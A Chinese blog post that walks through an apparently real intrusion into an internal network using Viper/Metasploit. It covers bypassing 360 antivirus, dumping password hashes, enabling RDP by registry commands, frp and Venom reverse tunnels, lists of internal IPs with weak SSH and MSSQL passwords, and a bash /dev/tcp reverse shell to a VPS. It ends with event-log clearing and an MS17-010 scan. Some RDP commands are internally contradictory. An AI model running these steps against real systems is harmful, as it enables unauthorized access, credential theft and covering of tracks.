实战| 记一次借Viper来多重内网渗透

最新推荐文章于 2024-06-24 15:30:00 发布
最新推荐文章于 2024-06-24 15:30:00 发布
阅读量2.3k 收藏 7
点赞数 3
分类专栏: 内网 实战 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_29437513/article/details/125400635
版权
本文记录了一次使用Viper进行内网渗透的过程,包括如何绕过360防护上线,抓取系统哈希,通过端口转发实现内网访问,以及利用Venom进行内网横向移动。作者还分享了内网资产扫描和端口转发工具的使用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

​ 实战| 记一次借Viper来多重内网渗透

马上hw,这两天闲的荒,来点实操, --2022/6/21 19:05 ECHO::

上次打攻防漏了很多web端、很多ssh这块和端口转发的内容,,算是个很大的缺口,从我那上百个shell中随机挑个站点,开始一场内网渗透。具体怎么拿的shell,在这里,

https://blog.youkuaiyun.com/qq_29437513/article/details/122283851

0x01.Viper上线

​ viper更新到1.5.22了,通过Callback回调函数生成免杀exe,下载本地,上传目标机

1

冰蝎执行

2

目标环境有360,但viper还是上线了

3

老话题: 怎么绕过的360?怎么上线的?

  1. 某60,执行命令拦的很,各种白名单拦截,同时还弹窗,最常见的net user,

执行返回拒绝,这种情况360全部功能全开

4

2.第二种情况,360不全开,比如,用户长时间未登录,锁定,不会全拦5-1

0x02.抓取Hash

上线后,抓取hash,viper自带有hashdump,但需要进程x64,默认上线的进程x86,进行进程迁移,,选择高权限的conhost.exe 2345explor 这些进程,(尽量不选择靠前的系统进程,注入容易重启)

5-2

抓到hash,拿去解密,Aa123456,这个内网常用弱口令,mssql和rdp,ssh常用(root admin123)

5-3

msf模块,注册表开启3389 post/windows/manage/enable_rdp

reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1"
execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
execute -H -f cmd.exe -a "/c sc stop termservice"
execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"

注册表的端口值

键1

netstat发现已经监听,但端口扫描未发现开启,得出结论,这是内网机器,通过映射到出口ip上,

6-4

0x03.端口转发

内网的机子,虽然有webshell,但他是映射到出口ip上,不能正向代理。

可以反向代理,机子能访问外网vps的端口,吧流量转到vps端口上,在vps开个端口转发,本地pc机进行内网访问。

我这里用过的有frp 和Venom

01.frp的代理,常用的是vps监听端口,内网吧3389流量转发给vps

02.Venom的代理,和frp差不多,通常可以配合proxifer流量代理,本地Pc机访问到内网应用。

本地测试 frp

​ 服务端只需要配置bind_port ,这里vps配置22222,

7

​ webshell端的frpc.ini配置,转发流量到vps的22222,允许外网通过vps的6000端口访问3389服务

7-1

转发成功,

8

吧解密的管理员密码登录

8-1

查看事件管理器,清除事件,很明显看到之前有人反复fuzz登录密码,同时登录没有rdp登录成功通过别的方式比如webshell部分也会记录,进程services.exe tomcat.exewebshell登录

发现有teamviewer

9

0x04.内网横向

内网横向有域打域控,没域打内网其他的设备,看能拿多少台服务器,这次测试的目的是内网的服务器,内网的网络设备,摄像头、安全设备、数据库不考虑在内

判断域,不存在域

	net time /domain	  域控的时间同步

	net config workstation 查看主机在内网的角色

横向我用的是端口转发是Venom,这tm就是神器,稳的一批。

内网资产扫描我用的是

https://github.com/1n7erface/RequestTemplate

扫描b端很全,,常见的ssh、redis和web扫描,xray的内核,挂到rdp里面

一些ssh

ssh 10.10.11.113 22 root admin123
ssh 10.10.11.110 22 root admin123
ssh 10.10.11.114 22 root admin123
10.10.30.83 1433 sa Aa123456

Venom内网渗透

1.webshell执行命令 agent.exe rhost rport

11-1

2.vps端监听1009,goto 1进行操作,socks代理出来本地PC通过proxifer代理连接

11-2

本地PC通过Proxifer设置socks代理

12

设置代理规则

代理2

本地PC-xshell连接内网ssh,

14

登录成功,查看history,有很明显的开发痕迹,这里不进行后续渗透

a

nc反弹shell到vps,点到为止,

nc -lvp 6000
bash -i >& /dev/tcp/vpsip/6000 0>&1

反弹成功,拿到shell

15

到此为止,,走之前清理痕迹,msf批量扫描ms17-010捡个漏

msf添加路由,

msf

有捡漏,但不进行后续渗透

同网段

内网渗透-红队内网渗透工具(Viper)
lza20001103的博客
05-22 9011
红队内网渗透工具(Viper)
一次内网靶机实战
千寻的博客
11-05 2189
一次内网靶机实战录,1、shiro反序列化漏洞 2、strut2漏洞 3、Drupal漏洞 4、内网代理工具 5、数据库连接工具 6、window的samba漏洞 7、viper的使用
viper:一款中国人写的红队服务器——一次内网穿透练习
最新发布
爱玩游戏的黑客的博客
06-24 1732
利用 struts2 攻击边界web服务器写入冰蝎木马viper - 监听载荷 - 生成载荷选择反弹的Java载荷设定lport:6666载荷类型:war重命名war为 ma.war冰蝎把ma.war上传到tomcat\webapp\目录下刷新冰蝎的目录如果生成了ma这个目录访问:http://ip:8080/ma 地址,会发现viper这面木马上线在viper上线的主机上右键点选内网路由添加路由,建议使用自动生成路由内网代理 - 新增代理 - 设定代理端口。
忆享科技戟星安全实验室|内网渗透神器-Viper的基本使用
m0_61431042的博客
08-19 2047
viper提供图形化的操作界面,用户使用浏览器即可进行内网渗透,内置70+个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类。
三层内网渗透
xjh8023的博客
08-26 1562
内网拓扑图 第一层 首先入口网站是一个dedecms 拿到这个网站先上扫描器 果然有rebots.txt,访问 http://10.10.9.110//ffffffffllllllllllaaaaaaaagggggg22222222222.txt flag2 flag{f784234649d7ef161229349d1d76ba8d} 接着我们想要拿到网站的shell,在漏洞库中发现可以利用dedeCMS后台上传getshell漏洞(CNVD-2018-01221) 参考链接:https://blo
2024年最全Go:使用Viper和YAML管理配置文件(1),一次腾讯Golang岗面试笔试总结
2401_84830208的博客
05-11 579
Viper是一个Go语言编写的应用程序配置解决方案,支持多种配置格式,包括JSONTOMLYAMLHCL和配置文件。它不仅可以从文件加载配置,还可以从环境变量、命令行参数以及远程配置系统(如Consul、Etcd)中读取配置。
多重内网靶场
weixin_52240463的博客
01-23 3019
teamssix多重内网靶场
多重路由NAT映射上网
03-10
多重路由NAT映射上网!一条内网可上网的网线做NAT映射 使更多网段可上网·
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1623
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
浅试Viper
A10ng_的博客
04-15 5197
Viper(炫彩蛇) Viper(炫彩蛇)是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化.Viper基于msf二次开发, 提供图形化的操作界面,用户基于浏览器即可进行内网渗透。使用的方法都跟msf几乎一样,使用效果还是不错的里面现在已经集成了98个模块了。 这里用我之前讲取证溯源讲座搭的环境,用Viper再打一次,看看有啥不一样的体验。 Viper安装 安装比较简单,没有什么坑,跟着官方给的文档直接安就OK了 传送门 viper-c is up-to-date 当出现这串字
计算机出现多重网络及其解决方案
热门推荐
qq_37711989的博客
05-08 1万+
一、问题描述 在已经联网(拨号上网)的情况下,在“网络和共享中心”设置页面中,显示我的网络是“多重网络”,并且在“活动网络”中出现了两个连接:一个是本地连接,显示是链接到了Inernet;另一个是未识别网络,无法访问Internet。并且,在我能够正常的上网浏览情况下,出现了几个问题: (1)桌面右下角的网络图标是叉; (2)本地连接只有一个,但在cmd中使用ipconfig命令发现有多
Viper的使用
weixin_57448301的博客
04-23 630
入门级viper模块学习:监听载荷模块、## WebDelivery模块
Viper+MSF:靶机代理转发上线学习
一只爱吃橙子的羊
02-12 1736
Viper+MSF:靶机代理转发上线学习
Viper渗透框架
HAKUNAMATATATTA的博客
01-10 5345
Viper (炫彩蛇)是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化。集成杀软绕过,内网隧道,文件管理,命令行等基础功能。当前已集成70+个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类。目标是帮助红队工程师提高攻击效率,简化操作,降低技术门槛。支持在浏览器中运行原生 msfconsole ,且支持多人协作
kali安装Viper和docker (本人亲测,一遍就过)
weixin_64647213的博客
06-09 2521
docker是是一款虚拟化、可以进行快塑部署、性能开销低的开源的应用容器引擎,基于go语言开发,可以让开发者打包他们的引用以及依赖包包到一个轻量级、可以移植的‘容器’中,然后发布到任何流行的Linux机器上,实现虚拟化。方法二:在终端输入ifconfig查询本机ip,使用本机ip+60000进入平台登录.,用户名:root 密码:自定义密码。service docker start //启动docker服务。docker version //查看docker版本信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ECHO::

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值